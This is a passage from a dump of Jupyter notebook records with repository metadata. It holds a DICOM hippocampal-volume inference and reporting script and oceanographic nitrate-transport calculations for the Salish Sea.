"rs = np.arange(0.01,3,0.01)\nhs = np.vstack([rs, np.zeros_like(rs)]).transpose()\nplt.plot(rs, [K_Gx(h) for h in hs], label='K_Gx')\nplt.plot(rs, [K_Gy(h) for h in hs], label='K_Gy')\nplt.legend()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
e7092c5df433d420c064f0e284a71e4e1c9c49eb | 201,779 | ipynb | Jupyter Notebook | section3/src/inference_dcm.ipynb | iDataist/Hippocampal_Volume_Quantification_in_Alzheimer-s_Progression | 803f079b1feb6aadd8e305eba507a23bda03ab69 | [
"MIT"
] | 2 | 2020-06-23T20:01:30.000Z | 2020-08-11T02:53:07.000Z | section3/src/inference_dcm.ipynb | iDataist/Hippocampal_Volume_Quantification_in_Alzheimer-s_Progression | 803f079b1feb6aadd8e305eba507a23bda03ab69 | [
"MIT"
] | null | null | null | section3/src/inference_dcm.ipynb | iDataist/Hippocampal_Volume_Quantification_in_Alzheimer-s_Progression | 803f079b1feb6aadd8e305eba507a23bda03ab69 | [
"MIT"
] | 2 | 2020-07-19T17:04:49.000Z | 2020-08-27T10:55:45.000Z | 397.986193 | 152,516 | 0.923798 | [
[
[
"\"\"\"\nHere we do inference on a DICOM volume, constructing the volume first, and then sending it to the\nclinical archive\n\nThis code will do the following:\n 1. Identify the series to run HippoCrop.AI algorithm on from a folder containing multiple studies\n 2. Construct a NumPy volume from a set of DICOM files\n 3. Run inference on the constructed volume\n 4. Create report from the inference\n 5. Call a shell script to push report to the storage archive\n\"\"\"\n\nimport os\nimport sys\nimport datetime\nimport time\nimport shutil\nimport subprocess\n\nimport numpy as np\nimport pydicom\n\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\nfrom inference.UNetInferenceAgent import UNetInferenceAgent\n\ndef load_dicom_volume_as_numpy_from_list(dcmlist):\n \"\"\"Loads a list of PyDicom objects a Numpy array.\n Assumes that only one series is in the array\n\n Arguments:\n dcmlist {list of PyDicom objects} -- path to directory\n\n Returns:\n tuple of (3D volume, header of the 1st image)\n \"\"\"\n\n slices = [np.flip(dcm.pixel_array).T for dcm in sorted(dcmlist, key=lambda dcm: dcm.InstanceNumber)]\n\n hdr = dcmlist[0]\n\n # zero-out Pixel Data since the users of this function are only interested in metadata\n hdr.PixelData = None\n return (np.stack(slices, 2), hdr)\n\ndef get_predicted_volumes(pred):\n \"\"\"Gets volumes of two hippocampal structures from the predicted array\n\n Arguments:\n pred {Numpy array} -- array with labels. Assuming 0 is bg, 1 is anterior, 2 is posterior\n\n Returns:\n A dictionary with respective volumes\n \"\"\"\n volume_ant = np.sum(pred == 1)\n volume_post = np.sum(pred == 2)\n total_volume = np.sum(pred > 0)\n return {\"anterior\": volume_ant, \"posterior\": volume_post, \"total\": total_volume}\n\ndef create_report(inference, header, orig_vol, pred_vol):\n \"\"\"Generates an image with inference report\n\n Arguments:\n inference {Dictionary} -- dict containing anterior, posterior and full volume values\n header {PyDicom Dataset} -- DICOM header\n orig_vol {Numpy array} -- original volume\n pred_vol {Numpy array} -- predicted label\n\n Returns:\n PIL image\n \"\"\"\n\n # The code below uses PIL image library to compose an RGB image that will go into the report\n # A standard way of storing measurement data in DICOM archives is creating such report and\n # sending them on as Secondary Capture IODs (http://dicom.nema.org/medical/dicom/current/output/chtml/part03/sect_A.8.html)\n # Essentially, the report is just a standard RGB image, with some metadata, packed into \n # DICOM format. \n\n pimg = Image.new(\"RGB\", (1000, 1000))\n draw = ImageDraw.Draw(pimg)\n\n header_font = ImageFont.truetype(\"assets/Roboto-Regular.ttf\", size=40)\n main_font = ImageFont.truetype(\"assets/Roboto-Regular.ttf\", size=20)\n\n# slice_nums = [orig_vol.shape[2]//3, orig_vol.shape[2]//2, orig_vol.shape[2]*3//4] \n\n # Create the report and show information relevant to clinicians. \n\n draw.text((50, 50), \"HippoVolume.AI\", (255, 255, 255), font=header_font)\n draw.multiline_text((50, 140),\n f\"Patient ID: {header.PatientID} \\n \\\n Study Description : {header.StudyDescription}\\n \\\n Series Description: {header.SeriesDescription}\\n \\\n Modality: {header.Modality}\\n \\\n Image Type: {header.ImageType}\\n \\\n Anterior Volume: {inference['anterior']}\\n \\\n Posterior Volume: {inference['posterior']}\\n \\\n Total Volume: {inference['total']}\\n\", \n (255, 255, 255), font=main_font)\n\n # Create a PIL image from array:\n # Numpy array needs to flipped, transposed and normalized to a matrix of values in the range of [0..255]\n nd_orig = np.flip((orig_vol[0, :, :]/np.max(orig_vol[0, :, :]))*0xff).T.astype(np.uint8)\n # create a PIL image from numpy array\n pil_orig = Image.fromarray(nd_orig, mode=\"L\").convert(\"RGBA\").resize((400, 400))\n # paste the PIL image into the main report image object (pimg)\n pimg.paste(pil_orig, box=(50, 500))\n \n nd_pred = np.flip((pred_vol[0, :, :]/np.max(pred_vol[0, :, :]))*0xff).T.astype(np.uint8)\n # create a PIL image from numpy array\n pil_pred = Image.fromarray(nd_pred, mode=\"L\").convert(\"RGBA\").resize((400, 400))\n # paste the PIL image into the main report image object (pimg)\n pimg.paste(pil_pred, box=(550, 500))\n\n return pimg\n\ndef save_report_as_dcm(header, report, path):\n \"\"\"Writes the supplied image as a DICOM Secondary Capture file\n\n Arguments:\n header {PyDicom Dataset} -- original DICOM file header\n report {PIL image} -- image representing the report\n path {Where to save the report}\n\n Returns:\n N/A\n \"\"\"\n\n # create a DICOM Secondary Capture instance that will be correctly interpreted by most imaging viewers including OHIF\n # Set up DICOM metadata fields. Most of them will be the same as original file header\n out = pydicom.Dataset(header)\n\n out.file_meta = pydicom.Dataset()\n out.file_meta.TransferSyntaxUID = pydicom.uid.ExplicitVRLittleEndian\n\n out.is_little_endian = True\n out.is_implicit_VR = False\n\n # change class to Secondary Capture\n out.SOPClassUID = \"1.2.840.10008.5.1.4.1.1.7\"\n out.file_meta.MediaStorageSOPClassUID = out.SOPClassUID\n\n # The report is a separate image series of one image\n out.SeriesInstanceUID = pydicom.uid.generate_uid()\n out.SOPInstanceUID = pydicom.uid.generate_uid()\n out.file_meta.MediaStorageSOPInstanceUID = out.SOPInstanceUID\n out.Modality = \"OT\" \n out.SeriesDescription = \"HippoVolume.AI\"\n\n out.Rows = report.height\n out.Columns = report.width\n\n out.ImageType = r\"DERIVED\\PRIMARY\\AXIAL\" # deriving this image from patient data\n out.SamplesPerPixel = 3 # building an RGB image.\n out.PhotometricInterpretation = \"RGB\"\n out.PlanarConfiguration = 0 # bytes encode pixels as R1G1B1R2G2B2... as opposed to R1R2R3...G1G2G3...\n out.BitsAllocated = 8 # using 8 bits/pixel\n out.BitsStored = 8\n out.HighBit = 7\n out.PixelRepresentation = 0\n\n # Set time and date\n dt = datetime.date.today().strftime(\"%Y%m%d\")\n tm = datetime.datetime.now().strftime(\"%H%M%S\")\n out.StudyDate = dt\n out.StudyTime = tm\n out.SeriesDate = dt\n out.SeriesTime = tm\n\n out.ImagesInAcquisition = 1\n\n # empty these since most viewers will then default to auto W/L\n out.WindowCenter = \"\"\n out.WindowWidth = \"\"\n\n # Data imprinted directly into image pixels is called \"burned in annotation\"\n out.BurnedInAnnotation = \"YES\"\n\n out.PixelData = report.tobytes()\n\n pydicom.filewriter.dcmwrite(path, out, write_like_original=False)\n \n# path = '../TestVolumes'\ndef get_series_for_inference(path):\n \"\"\"Reads multiple series from one folder and picks the one\n to run inference on.\n\n Arguments:\n path {string} -- location of the DICOM files\n\n Returns:\n Numpy array representing the series\n \"\"\"\n\n series_path = [dir for dir, subdirs, files in os.walk(path) if 'HCropVolume' in dir]\n chosen_path = np.random.choice(series_path) \n series_for_inference = [pydicom.dcmread(os.path.join(chosen_path, f)) for f in os.listdir(chosen_path)]\n\n # Check if there are more than one series (using set comprehension).\n if len({f.SeriesInstanceUID for f in series_for_inference}) != 1:\n print(\"Error: can not figure out what series to run inference on\")\n return []\n\n return series_for_inference\n\ndef os_command(command):\n # Comment this if running under Windows\n sp = subprocess.Popen([\"/bin/bash\", \"-i\", \"-c\", command])\n sp.communicate()\n\n # Uncomment this if running under Windows\n # os.system(command)\n\nif __name__ == \"__main__\":\n # This code expects a single command line argument with link to the directory containing\n # routed studies\n if len(sys.argv) != 2:\n print(\"You should supply one command line argument pointing to the routing folder. Exiting.\")\n sys.exit()\n\n # Find all subdirectories within the supplied directory. We assume that \n # one subdirectory contains a full study\n subdirs = [os.path.join(sys.argv[1], d) for d in os.listdir(sys.argv[1]) if\n os.path.isdir(os.path.join(sys.argv[1], d))]\n\n # Get the latest directory\n study_dir = sorted(subdirs, key=lambda dir: os.stat(dir).st_mtime, reverse=True)[0]\n\n print(f\"Looking for series to run inference on in directory {study_dir}...\")\n\n volume, header = load_dicom_volume_as_numpy_from_list(get_series_for_inference(study_dir))\n print(f\"Found series of {volume.shape[2]} axial slices\")\n\n print(\"HippoVolume.AI: Running inference...\")\n # Use the UNetInferenceAgent class and model parameter file from the previous section\n inference_agent = UNetInferenceAgent(\n device=\"cpu\",\n parameter_file_path=r\"\")\n\n # Run inference\n pred_label = inference_agent.single_volume_inference_unpadded(np.array(volume))\n pred_volumes = get_predicted_volumes(pred_label)\n\n # Create and save the report\n print(\"Creating and pushing report...\")\n report_save_path = r\"../out/report.dcm\"\n report_img = create_report(pred_volumes, header, volume, pred_label)\n save_report_as_dcm(header, report_img, report_save_path)\n\n # Send report to the storage archive\n os_command(\"sudo storescu localhost 4242 -v -aec HIPPOAI +r +sd ../out/report.dcm\")\n\n # remove the study dir if run as root user\n # sleep to let the StoreSCP server process the report \n # the main archive is routing everyting that is sent to it, including thefreshly generated report\n # I want to give it time to save before cleaning it up\n time.sleep(2)\n shutil.rmtree(study_dir, onerror=lambda f, p, e: print(f\"Error deleting: {e[1]}\"))\n\n print(f\"Inference successful on {header['SOPInstanceUID'].value}, out: {pred_label.shape}\",\n f\"volume ant: {pred_volumes['anterior']}, \",\n f\"volume post: {pred_volumes['posterior']}, total volume: {pred_volumes['total']}\")",
"You should supply one command line argument pointing to the routing folder. Exiting.\n"
],
[
"path = '../TestVolumes'\ndcmlist = get_series_for_inference(path)\nvolume, header = load_dicom_volume_as_numpy_from_list(dcmlist)",
"_____no_output_____"
],
[
"volume.shape",
"_____no_output_____"
],
[
"header",
"_____no_output_____"
],
[
"inference_agent = UNetInferenceAgent(device=\"cpu\",parameter_file_path=r\"\")",
"_____no_output_____"
],
[
"pred_label = inference_agent.single_volume_inference_unpadded(np.array(volume), 64)\npred_volumes = get_predicted_volumes(pred_label)",
"_____no_output_____"
],
[
"# Create and save the report\nprint(\"Creating and pushing report...\")\nreport_img = create_report(pred_volumes, header, volume, pred_label)\nreport_img",
"Creating and pushing report...\n"
],
[
"from matplotlib.pyplot import imshow\n%matplotlib inline\nreport_save_path = r\"../out/report.dcm\"\nsave_report_as_dcm(header, report_img, report_save_path)\nimshow(np.asarray(pydicom.dcmread(report_save_path).pixel_array))",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7093ada3f9ba1a723eaed8b5f50ab61d5d0788f | 152,311 | ipynb | Jupyter Notebook | notebooks/results/transportsUpper6-WithArrowsAndV-2016.ipynb | e-olson/NSOGNO3 | 3b5d4f3a6f0353c33c1858f353486ae583023824 | [
"Apache-2.0"
] | null | null | null | notebooks/results/transportsUpper6-WithArrowsAndV-2016.ipynb | e-olson/NSOGNO3 | 3b5d4f3a6f0353c33c1858f353486ae583023824 | [
"Apache-2.0"
] | null | null | null | notebooks/results/transportsUpper6-WithArrowsAndV-2016.ipynb | e-olson/NSOGNO3 | 3b5d4f3a6f0353c33c1858f353486ae583023824 | [
"Apache-2.0"
] | null | null | null | 143.284102 | 82,996 | 0.877396 | [
[
[
"### 6 m is mean nitricline depth and just below 10% light level",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nimport netCDF4 as nc\nimport numpy as np\nimport os\nimport glob\nimport datetime as dt\nfrom salishsea_tools import viz_tools\nfrom matplotlib.ticker import FormatStrFormatter\nimport cmocean\nfrom salishsea_tools import viz_tools, evaltools as et\nimport NorthNut as nn\nimport matplotlib.gridspec as gridspec\nimport pickle\nimport matplotlib as mpl\nimport matplotlib.patheffects as path_effects\nmpl.rc('xtick', labelsize=8)\nmpl.rc('ytick', labelsize=8)\nmpl.rc('legend', fontsize=8)\nmpl.rc('axes', titlesize=8)\nmpl.rc('axes', labelsize=8)\nmpl.rc('figure', titlesize=8)\nmpl.rc('font', size=8)\nmpl.rc('text', usetex=True)\nmpl.rc('text.latex', preamble = r'''\n \\usepackage{txfonts}\n \\usepackage{lmodern}\n ''')\nmpl.rc('font', family='sans-serif', weight='normal', style='normal')\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n%matplotlib inline",
"NorthNut defined variables: ig0,ig1,jg0,jg1,fformat0\nNorthNut defined variables: vmask, vmask0, umask, umask0, tmask, fmask, gdept, gdept_1d, e1t, e2t, e12t, e1f, e2f, e1v, e2u, e3t_1d\nNorthNut defined variables: boxCol, colL, colR, arrowwidth, headwidth, headlength, alen, toff, apw, apk\n"
],
[
"ig0=nn.ig0\nig1=nn.ig1\njg0=nn.jg0\njg1=nn.jg1\ntmask=nn.tmask\numask=nn.umask\nvmask=nn.vmask\numask0=nn.umask0\nvmask0=nn.vmask0\nboxCol=nn.boxCol\ncolL=nn.colL\ncolR=nn.colR",
"_____no_output_____"
],
[
"e12t=nn.e12t",
"_____no_output_____"
],
[
"k=6 #depth presented here\nk1=30 # max depth to do calcs to\nstart=dt.datetime(2016,5,15) # originally 5/15-8/15, but changed to even number of fortnights (6, end is included)\nend=dt.datetime(2016,8,20)\nmod_basedir='/data/eolson/results/MEOPAR/SS36runs/linkHC201812/'\nmod_nam_fmt='nowcast'\nmod_flen=1\nsaveloc='/data/eolson/results/MEOPAR/SS36runs/calcFiles/NTransport/'\nfver='HC201812'",
"_____no_output_____"
]
],
[
[
"made interval a multiple of a fortnight in attempt to minimize aliasing of tidal cycle:",
"_____no_output_____"
]
],
[
[
"# calc transports: boxes in full model coords\nboxes,boxesS=nn.defboxes(k)",
"volumes: \n(40, 130, 97)\n0 vol: 232834007.16923195 m3\n0 north face area: 0.017903174399708822 km2\n0 south face area: 0.023887115963210383 km2\n0 east face area: 0.0 km2\n0 floor area: 38.10316762126778 km2\n0 floor area: 38.10316762126778 km2\n(40, 130, 97)\n1 vol: 475501033.2591236 m3\n1 north face area: 0.051981996171633744 km2\n1 south face area: 0.0660928789851366 km2\n1 east face area: 0.04443908484818648 km2\n1 floor area: 76.65649877674242 km2\n1 floor area: 76.65649877674242 km2\n(40, 130, 97)\n2 vol: 467855857.4262955 m3\n2 north face area: 0.0660928789851366 km2\n2 south face area: 0.058877382444252245 km2\n2 east face area: 0.044474769797453136 km2\n2 floor area: 76.13281888160705 km2\n2 floor area: 76.13281888160705 km2\n(40, 130, 97)\n3 vol: 475349561.3011287 m3\n3 north face area: 0.0691002936013758 km2\n3 south face area: 0.05633497645148102 km2\n3 east face area: 0.044501987470235926 km2\n3 floor area: 77.68207812856889 km2\n3 floor area: 77.68207812856889 km2\n(40, 130, 97)\n4 vol: 460253674.3391861 m3\n4 north face area: 0.06656271287114815 km2\n4 south face area: 0.05892732464151781 km2\n4 east face area: 0.04453044828517323 km2\n4 floor area: 76.70622481510526 km2\n4 floor area: 76.70622481510526 km2\n(40, 130, 97)\n5 vol: 468674561.80761874 m3\n5 north face area: 0.07171871451380164 km2\n5 south face area: 0.05339660783873324 km2\n5 east face area: 0.04455783029196595 km2\n5 floor area: 76.99707667445263 km2\n5 floor area: 76.99707667445263 km2\n"
],
[
"flistV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_V',1)\nflistU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_U',1)\nflistW=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_W',1)\nflistC=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'carp_T',1)\nflistT=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'ptrc_T',1)\nflistP=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_T',1)\nflistGV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_V',1)\nflistGU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_U',1)",
"ftype=dian_V, are you sure? (if yes, add to list)\nftype=dian_U, are you sure? (if yes, add to list)\nftype=dian_W, are you sure? (if yes, add to list)\n"
],
[
"NBound, SBound, EBound, BBound, NBoundMix, SBoundMix, EBoundMix, BBoundMix, Content, Vol, A_N, A_S, A_E, times, boxes = nn.calcTransps(\n start,end,k1,mod_flen,fver,saveloc,boxes,boxesS,flistV,flistU,flistW,flistC,flistT,recalc=False)",
"_____no_output_____"
],
[
"# vertical transport into 4th box\nnp.shape(BBound[3])",
"_____no_output_____"
]
],
[
[
"NO3_VT v*dx*dz*C = mmol N/s \nNO3_UT u*dy*dz*C = m/s*m2*mmol/m3 = mmol N/s \nVLDFNO3 dC/dt= (F1-F0)/(dx*dy*dz) => F in mmol N/s \nULDFNO3 mmol N/s\nNO3_WT w*dx*dy*C = mmol N/s\nVMIXNO3 ~(Cadz-Cbdz)/dt=mmol/m3*1/s*m = mmol N/m2/s ",
"_____no_output_____"
]
],
[
[
"meanT, meanM = nn.calcFluxFields(flistV,flistU,flistW,flistC,k,saveloc,start,end,fver,recalc=False)",
"_____no_output_____"
],
[
"recalc=False\nfformat0='%Y%m%d'\nsavepathT=saveloc+'saveVolTransp_'+fver+'_k'+str(k)+'_'+start.strftime(fformat0)+\\\n '-'+end.strftime(fformat0)+'.pkl'\n# calc mean velocities upper k\nif recalc==True:\n VT_i=np.zeros((len(flistGV)*24,jg1-jg0,ig1-ig0))\n UT_i=np.zeros((len(flistGV)*24,jg1-jg0,ig1-ig0))\n for iif in range(0,len(flistGV)):\n with nc.Dataset(flistGV.loc[iif,['paths']].values[0]) as fv, \\\n nc.Dataset(flistGU.loc[iif,['paths']].values[0]) as fu, \\\n nc.Dataset(flistC.loc[iif,['paths']].values[0]) as fc:\n e3te=fc.variables['e3t'][:,:k,jg0:jg1,ig0:ig1]\n VTe=np.sum(0.5*(fv.variables['vomecrty'][:,:k,(jg0-1):(jg1-1),ig0:ig1]+fv.variables['vomecrty'][:,:k,jg0:jg1,ig0:ig1])*e3te,1)\n UTe=np.sum(0.5*(fu.variables['vozocrtx'][:,:k,jg0:jg1,(ig0-1):(ig1-1)]+fu.variables['vozocrtx'][:,:k,jg0:jg1,ig0:ig1])*e3te,1)\n VT_i[(iif*24):(iif*24+24),:,:]=VTe\n UT_i[(iif*24):(iif*24+24),:,:]=UTe\n mVT=np.mean(VT_i,0)\n mUT=np.mean(UT_i,0)\n fformat0='%Y%m%d'\n pickle.dump({'mVT':mVT,'mUT':mUT},open(savepathT,'wb'))\nelse:\n data=pickle.load(open(savepathT,'rb'))\n mVT=data['mVT']\n mUT=data['mUT']",
"_____no_output_____"
],
[
"recalc=False\nsavepathV=saveloc+'saveVel_'+fver+'_k'+str(k)+'_'+start.strftime(fformat0)+\\\n '-'+end.strftime(fformat0)+'.pkl'\n# calc mean velocities upper k\nif recalc==True:\n V_i=np.zeros((len(flistGV)*24,jg1-jg0,ig1-ig0))\n U_i=np.zeros((len(flistGV)*24,jg1-jg0,ig1-ig0))\n for iif in range(0,len(flistGV)):\n with nc.Dataset(flistGV.loc[iif,['paths']].values[0]) as fv, \\\n nc.Dataset(flistGU.loc[iif,['paths']].values[0]) as fu, \\\n nc.Dataset(flistC.loc[iif,['paths']].values[0]) as fc:\n e3te=fc.variables['e3t'][:,:k,jg0:jg1,ig0:ig1]\n Ve=np.sum(0.5*(fv.variables['vomecrty'][:,:k,(jg0-1):(jg1-1),ig0:ig1]+fv.variables['vomecrty'][:,:k,jg0:jg1,ig0:ig1])*e3te,1)/np.sum(e3te,1)\n Ue=np.sum(0.5*(fu.variables['vozocrtx'][:,:k,jg0:jg1,(ig0-1):(ig1-1)]+fu.variables['vozocrtx'][:,:k,jg0:jg1,ig0:ig1])*e3te,1)/np.sum(e3te,1)\n V_i[(iif*24):(iif*24+24),:,:]=Ve\n U_i[(iif*24):(iif*24+24),:,:]=Ue\n mV=np.mean(V_i,0)\n mU=np.mean(U_i,0)\n fformat0='%Y%m%d'\n pickle.dump({'mV':mV,'mU':mU},open(savepathV,'wb'))\nelse:\n data=pickle.load(open(savepathV,'rb'))\n mV=data['mV']\n mU=data['mU']",
"_____no_output_____"
],
[
"mapCol=(0.67, 0.8, 0.64) # rgb\ncmb=cmocean.tools.crop_by_percent(cmocean.cm.balance, 45, which='both', N=None)\ncmb.set_bad(mapCol)\ncmc=cmocean.tools.crop_by_percent(cmocean.cm.tarn_r, 40, which='both', N=None)\ncmc.set_bad(mapCol)",
"_____no_output_____"
],
[
"for el in BBound.keys():\n print(el,np.mean(np.sum(BBound[el][:,:k]+BBoundMix[el][:,:k],1))*1e-3)",
"0 106.68687299579294\n1 67.73938469636559\n2 -91.42046017658305\n3 61.87491918843877\n4 2.664297754196007\n5 41.0880141843993\n"
]
],
[
[
"#### Sum of vertical mixing and transport NO3 supply to region in boxes:",
"_____no_output_____"
]
],
[
[
"np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\\\n BBound[1][:,:k]+BBoundMix[1][:,:k]+\\\n BBound[2][:,:k]+BBoundMix[2][:,:k]+\\\n BBound[3][:,:k]+BBoundMix[3][:,:k]+\\\n BBound[4][:,:k]+BBoundMix[4][:,:k]+\\\n BBound[5][:,:k]+BBoundMix[5][:,:k],1))*1e-3",
"_____no_output_____"
]
],
[
[
"##### Divide by area:",
"_____no_output_____"
]
],
[
[
"ABoxes=nn.boxAreas(k)",
"volumes: \n(40, 130, 97)\n0 vol: 232834007.16923195 m3\n0 north face area: 0.017903174399708822 km2\n0 south face area: 0.023887115963210383 km2\n0 east face area: 0.0 km2\n0 floor area: 38.10316762126778 km2\n0 floor area: 38.10316762126778 km2\n(40, 130, 97)\n1 vol: 475501033.2591236 m3\n1 north face area: 0.051981996171633744 km2\n1 south face area: 0.0660928789851366 km2\n1 east face area: 0.04443908484818648 km2\n1 floor area: 76.65649877674242 km2\n1 floor area: 76.65649877674242 km2\n(40, 130, 97)\n2 vol: 467855857.4262955 m3\n2 north face area: 0.0660928789851366 km2\n2 south face area: 0.058877382444252245 km2\n2 east face area: 0.044474769797453136 km2\n2 floor area: 76.13281888160705 km2\n2 floor area: 76.13281888160705 km2\n(40, 130, 97)\n3 vol: 475349561.3011287 m3\n3 north face area: 0.0691002936013758 km2\n3 south face area: 0.05633497645148102 km2\n3 east face area: 0.044501987470235926 km2\n3 floor area: 77.68207812856889 km2\n3 floor area: 77.68207812856889 km2\n(40, 130, 97)\n4 vol: 460253674.3391861 m3\n4 north face area: 0.06656271287114815 km2\n4 south face area: 0.05892732464151781 km2\n4 east face area: 0.04453044828517323 km2\n4 floor area: 76.70622481510526 km2\n4 floor area: 76.70622481510526 km2\n(40, 130, 97)\n5 vol: 468674561.80761874 m3\n5 north face area: 0.07171871451380164 km2\n5 south face area: 0.05339660783873324 km2\n5 east face area: 0.04455783029196595 km2\n5 floor area: 76.99707667445263 km2\n5 floor area: 76.99707667445263 km2\n"
],
[
"# units are umol/m2/s\nAsum=ABoxes[0]+ABoxes[1]+ABoxes[2]+ABoxes[3]+ABoxes[4]+ABoxes[5]\nnp.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\\\n BBound[1][:,:k]+BBoundMix[1][:,:k]+\\\n BBound[2][:,:k]+BBoundMix[2][:,:k]+\\\n BBound[3][:,:k]+BBoundMix[3][:,:k]+\\\n BBound[4][:,:k]+BBoundMix[4][:,:k]+\\\n BBound[5][:,:k]+BBoundMix[5][:,:k],1))/Asum*1e3",
"_____no_output_____"
],
[
"NBoundC, SBoundC, EBoundC, BBoundC, NBoundMixC, SBoundMixC, EBoundMixC, BBoundMixC = \\\n nn.transpConversions(boxes,NBound,SBound,EBound,BBound,NBoundMix,SBoundMix,EBoundMix,BBoundMix,k)",
"units now mol/s\n0\n9.947443564164551 -35.36731480236245 0.0\n-0.0046223353959914375 58.76628758233049 0.0\n1\n-22.620420567817963 2.780912185800212 -4.152702975741998\n-0.003609745963443457 26.68507539825033 0.01654148305007088\n2\n-48.21118237454796 -38.53446231146092 -5.828905089609929\n0.020290641983787206 10.629639434866348 0.022566290148021577\n3\n-15.233859569173294 16.33758039802773 0.9471348725929473\n0.010119958992957822 3.7240321789910458 0.023437269926385562\n4\n-23.81655244968974 -3.282389513837408 -0.7069941837524848\n5.932767951691176e-06 2.8153398651808828 0.01571380403468441\n5\n-15.806420454157982 9.432231135160077 3.7878209498426956\n0.01883030837182633 3.2020627328984146 0.011968896304912286\n"
],
[
"BBoundC",
"_____no_output_____"
],
[
"mask=dict()\nmask['V']=vmask0\nmask['U']=umask0\nmask['W']=tmask[k,:,:]",
"_____no_output_____"
],
[
"# NBoundC:\nfor el in NBoundC:\n print(el,NBoundC[el])",
"0 9.947443564164551\n1 -22.620420567817963\n2 -48.21118237454796\n3 -15.233859569173294\n4 -23.81655244968974\n5 -15.806420454157982\n"
],
[
"# SBoundC:\nfor el in SBoundC:\n print(el,SBoundC[el])",
"0 -10.705207468296186\n1 -48.21118237454796\n2 -17.121361889061724\n3 -23.95515532538627\n4 -14.44589312680721\n5 -14.68694807880987\n"
],
[
"-22.620420567817963+10.705207468296186",
"_____no_output_____"
],
[
"-17.121361889061724+15.233859569173294",
"_____no_output_____"
],
[
"-23.95515532538627+23.81655244968974",
"_____no_output_____"
],
[
"-15.806420454157982+14.44589312680721",
"_____no_output_____"
],
[
"# EBoundC:\nfor el in EBoundC:\n print(el,EBoundC[el])",
"0 0.0\n1 -4.152702975741998\n2 -5.828905089609929\n3 0.9471348725929473\n4 -0.7069941837524848\n5 3.7878209498426956\n"
],
[
"# BBoundC:\nfor el in BBoundC:\n print(el,BBoundC[el])",
"0 -35.36731480236245\n1 2.780912185800212\n2 -38.53446231146092\n3 16.33758039802773\n4 -3.282389513837408\n5 9.432231135160077\n"
],
[
"# BBoundMIXC:\nfor el in BBoundMixC:\n print(el,BBoundMixC[el])",
"0 58.76628758233049\n1 26.68507539825033\n2 10.629639434866348\n3 3.7240321789910458\n4 2.8153398651808828\n5 3.2020627328984146\n"
],
[
"fig=plt.figure(figsize=(7.5,5.2))\ngs0=gridspec.GridSpec(2,2,hspace=0.24,wspace=.13,left=.01,right=.93,bottom=.022,top=.92,\n width_ratios=[1,1],height_ratios=[1,1])\nax=list()\ncbax=list()\nfor jx in range(0,2):\n if jx==0:\n gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx],\n width_ratios=[10,10*(ig1-ig0-.5)/(ig1-ig0+13),11-10*(ig1-ig0-.5)/(ig1-ig0+13)],wspace=.1)\n gsl=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx],\n width_ratios=[10,10,1],wspace=.1)\n elif jx==1:\n gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx],\n width_ratios=[10,10,1],wspace=.1)\n gsl2=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx],\n width_ratios=[10,10,1],wspace=.1)\n ax1=fig.add_subplot(gsi[0])\n ax1.get_xaxis().set_visible(False)\n ax1.get_yaxis().set_visible(False)\n viz_tools.set_aspect(ax1)\n ax2=fig.add_subplot(gsi[1])\n ax2.get_xaxis().set_visible(False)\n ax2.get_yaxis().set_visible(False)\n viz_tools.set_aspect(ax2)\n ax3=fig.add_subplot(gsi[2])\n ax.append(ax1,)\n ax.append(ax2,)\n 